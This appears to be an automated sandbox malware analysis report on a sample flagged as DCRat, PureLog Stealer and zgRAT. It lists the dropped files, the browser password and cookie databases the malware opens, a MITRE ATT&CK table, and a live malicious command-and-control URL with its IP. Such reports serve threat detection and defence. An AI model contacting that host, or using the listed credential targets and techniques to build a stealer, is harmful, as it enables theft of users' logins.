Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe VolumeInformation
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Queries volume information: C:\Users\user\Desktop\4Awb1u1GcJ.exe VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe VolumeInformation
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Queries volume information: C:\Users\user\Desktop\4Awb1u1GcJ.exe VolumeInformation

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000000.00000002.1887728874.0000000012FBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4Awb1u1GcJ.exe PID: 5332, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dllhost.exe PID: 7580, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 4Awb1u1GcJ.exe, type: SAMPLE
Source: Yara match	File source: 0.0.4Awb1u1GcJ.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1664770511.0000000000A42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 4Awb1u1GcJ.exe, type: SAMPLE
Source: Yara match	File source: 0.0.4Awb1u1GcJ.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe, type: DROPPED

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journal
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000000.00000002.1887728874.0000000012FBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4Awb1u1GcJ.exe PID: 5332, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dllhost.exe PID: 7580, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 4Awb1u1GcJ.exe, type: SAMPLE
Source: Yara match	File source: 0.0.4Awb1u1GcJ.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1664770511.0000000000A42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 4Awb1u1GcJ.exe, type: SAMPLE
Source: Yara match	File source: 0.0.4Awb1u1GcJ.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	11 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	2 File and Directory Discovery	1 Taint Shared Content	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	124 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Scheduled Task/Job	1 Scheduled Task/Job	2 Obfuscated Files or Information	Security Account Manager	211 Security Software Discovery	SMB/Windows Admin Shares	1 Clipboard Data	12 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	21 Registry Run Keys / Startup Folder	21 Registry Run Keys / Startup Folder	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	141 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	33 Masquerading	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	141 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
4Awb1u1GcJ.exe	61%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
4Awb1u1GcJ.exe	100%	Avira	HEUR/AGEN.1323342
4Awb1u1GcJ.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\RM8EX6c6Td.bat	100%	Avira	BAT/Delbat.C
C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\IETDQDzo.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\Desktop\RrNkXoHQ.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\Desktop\YOJaOqPH.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	100%	Joe Sandbox ML
C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	100%	Joe Sandbox ML
C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	100%	Joe Sandbox ML
C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\RrNkXoHQ.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\YOJaOqPH.log	100%	Joe Sandbox ML
C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	61%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	61%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hxpWOXgnBGVLArPcwqxpuA.exe	61%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	61%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\IETDQDzo.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\RrNkXoHQ.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\YOJaOqPH.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\cOkJseIw.log	25%	ReversingLabs
C:\Users\user\Desktop\greisgmx.log	25%	ReversingLabs
C:\Users\user\Desktop\kaHiFPLi.log	8%	ReversingLabs
C:\Users\user\Desktop\pnhXwyoY.log	8%	ReversingLabs
C:\Users\user\Desktop\uJayprRQ.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat

Source	Detection	Scanner	Label	Link
http://143840cm.nyashteam.ru/DefaultPublic.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
143840cm.nyashteam.ru	37.44.238.250	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://143840cm.nyashteam.ru/DefaultPublic.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://duckduckgo.com/chrome_newtab	X54FKLunGc.48.dr	false	high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	j11z8HEtiF.48.dr	false	high
http://nuget.org/NuGet.exe	powershell.exe, 00000018.00000002.3222117287.0000018C10075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3177174189.0000021C90075000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/ac/?q=	X54FKLunGc.48.dr	false	high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	X54FKLunGc.48.dr	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000021.00000002.1950774668.0000021F39EA8000.00000004.00000800.00020000.00000000.sdmp	false	high
